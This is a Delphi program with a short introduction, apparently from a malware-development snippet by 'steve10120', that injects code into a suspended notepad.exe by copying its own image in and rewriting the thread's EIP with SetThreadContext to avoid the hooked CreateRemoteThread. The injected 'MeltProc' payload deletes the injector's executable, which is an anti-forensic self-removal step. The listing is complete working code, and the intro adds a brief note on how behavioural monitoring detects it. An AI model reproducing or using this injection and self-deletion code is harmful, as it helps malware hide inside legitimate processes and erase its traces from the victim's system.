Title: Code Injection without CreateRemoteThread
This snippet uses the GetThreadContext and SetThreadContext APIs as a replacement for the frequently hooked CreateRemoteThread API: the target is created with CREATE_SUSPENDED, the injector's whole loaded image is copied into it at the same base address, and the initial thread's EIP is redirected to the chosen function before the thread is resumed. One disadvantage of this method is that the target thread must remain suspended while its context is read and rewritten. Other limitations to know before relying on it: the code is 32-bit only (it rewrites CONTEXT.Eip and reads a 248-byte IMAGE_NT_HEADERS32); the copied image receives no relocation fix-ups, so VirtualAllocEx must succeed at exactly the injector's own image base inside the target; the kernel32 addresses in the copied import table are only valid if kernel32 is mapped at the same base in both processes; and, from a defender's point of view, the sequence create-suspended → VirtualAllocEx/WriteProcessMemory → SetThreadContext → ResumeThread is itself a well-known injection pattern, so avoiding CreateRemoteThread does not make the technique invisible to behavioural monitoring.

The listing below creates the target process in a suspended state, performs the injection, and then resumes its main thread:

program Inj;
// by steve10120
// Demonstration of code injection by thread-context hijacking instead of
// CreateRemoteThread. Only the Windows unit is needed; everything else is local.
uses
  Windows;

var
  // Full path of this executable, filled by GetModuleFileName in MeltFile
  // before the injection happens. Because the whole image (SizeOfImage bytes
  // from the module base) is written into the target, the copy carries the
  // already-populated buffer, which is how MeltProc knows what to delete.
  sBuff:    array[0..255] of Char;

{$R *.res}

// Payload that runs inside the target process as the redirected start of its
// main thread (see InjectCode). It deletes the injector's own executable, whose
// path was stored in sBuff before the image was copied over.
// Sleep(500) gives the injector process time to exit first: while that process
// is still running its image file is in use and DeleteFile is expected to fail.
// NOTE(review): this runs from a byte copy of the image, so Sleep/DeleteFile
// resolve through the copied import table - presumably only valid while
// kernel32 is mapped at the same address in both processes; confirm before use.
// The thread was pointed here by overwriting EIP with nothing pushed to return
// to, so a normal return from this procedure leaves the host thread at an
// undefined address - expect the target to fault once DeleteFile completes.
procedure MeltProc();
begin
  Sleep(500);
  DeleteFile(sBuff);
end;

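// Starts szProcessName suspended, copies this program's entire loaded image
// (SizeOfImage bytes from its module base) into the new process at the same
// base address, points the initial thread's EIP at pFunction and resumes it.
// Returns True only if every step succeeded. On any failure the half-prepared
// target is terminated so no suspended process is left behind, and both the
// process and thread handles are always closed. (The original never assigned
// Result, never checked VirtualAllocEx/WriteProcessMemory/Get-/SetThreadContext,
// and leaked both handles.)
// Limitations inherent to the technique, unchanged here:
//  - 32-bit only: CONTEXT.Eip is rewritten and IMAGE_NT_HEADERS32 is read.
//  - No relocation handling: the copy must land at this image's own base, so
//    VirtualAllocEx must succeed at exactly that address in the target.
//  - pFunction must belong to this image; it starts with nothing on the stack
//    to return to, so it should never return normally.
function InjectCode(szProcessName:string; pFunction:Pointer):Boolean;
var
  STARTINFO:  TStartupInfo;
  PROCINFO:   TProcessInformation;
  dSize:      DWORD;
  pInjected:  Pointer;
  dWritten:   DWORD;
  CONTEXT:    TContext;
  hMod:       THandle;
  IDH:        TImageDosHeader;
  INH:        TImageNtHeaders;
begin
  Result := False;
  FillChar(STARTINFO, SizeOf(TStartupInfo), #0);
  STARTINFO.cb := SizeOf(TStartupInfo);
  // CREATE_SUSPENDED: the main thread must not run before its context is replaced.
  if not CreateProcess(nil, PChar(szProcessName), nil, nil, FALSE, CREATE_SUSPENDED,
                       nil, nil, STARTINFO, PROCINFO) then
    Exit;
  try
    hMod := GetModuleHandle(nil);
    // Validate our own PE headers before trusting SizeOfImage.
    CopyMemory(@IDH, Pointer(hMod), SizeOf(TImageDosHeader));
    if IDH.e_magic <> IMAGE_DOS_SIGNATURE then
      Exit;
    CopyMemory(@INH, Pointer(hMod + IDH._lfanew), SizeOf(TImageNtHeaders));
    if INH.Signature <> IMAGE_NT_SIGNATURE then
      Exit;
    dSize := INH.OptionalHeader.SizeOfImage;
    // The image is copied without relocation, so it has to be placed at hMod.
    // If that range is already in use in the target, VirtualAllocEx returns nil;
    // previously that nil fell straight through into WriteProcessMemory.
    pInjected := VirtualAllocEx(PROCINFO.hProcess, Ptr(hMod), dSize,
                                MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if pInjected = nil then
      Exit;
    if (not WriteProcessMemory(PROCINFO.hProcess, pInjected, Ptr(hMod), dSize, dWritten))
       or (dWritten <> dSize) then
      Exit;
    FillChar(CONTEXT, SizeOf(TContext), #0);
    CONTEXT.ContextFlags := CONTEXT_FULL;
    if not GetThreadContext(PROCINFO.hThread, CONTEXT) then
      Exit;
    // Redirect the still-suspended initial thread to the injected function.
    CONTEXT.Eip := DWORD(pFunction);
    if not SetThreadContext(PROCINFO.hThread, CONTEXT) then
      Exit;
    // ResumeThread returns the previous suspend count, or DWORD(-1) on failure.
    Result := ResumeThread(PROCINFO.hThread) <> DWORD(-1);
  finally
    // Never leave a suspended, partially written process behind on failure.
    if not Result then
      TerminateProcess(PROCINFO.hProcess, 1);
    CloseHandle(PROCINFO.hThread);
    CloseHandle(PROCINFO.hProcess);
  end;
end;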

// Records this executable's path in sBuff, then launches notepad.exe suspended
// and redirects its main thread to MeltProc (see InjectCode). The path has to
// be captured before the injection, since the image copy carries sBuff's contents.
procedure MeltFile();
begin
  GetModuleFileName(0, sBuff, Length(sBuff));
  InjectCode('notepad.exe', @MeltProc);
end;

begin
  // Entry point: capture our own path and inject MeltProc into a fresh notepad.exe.
  MeltFile;
end.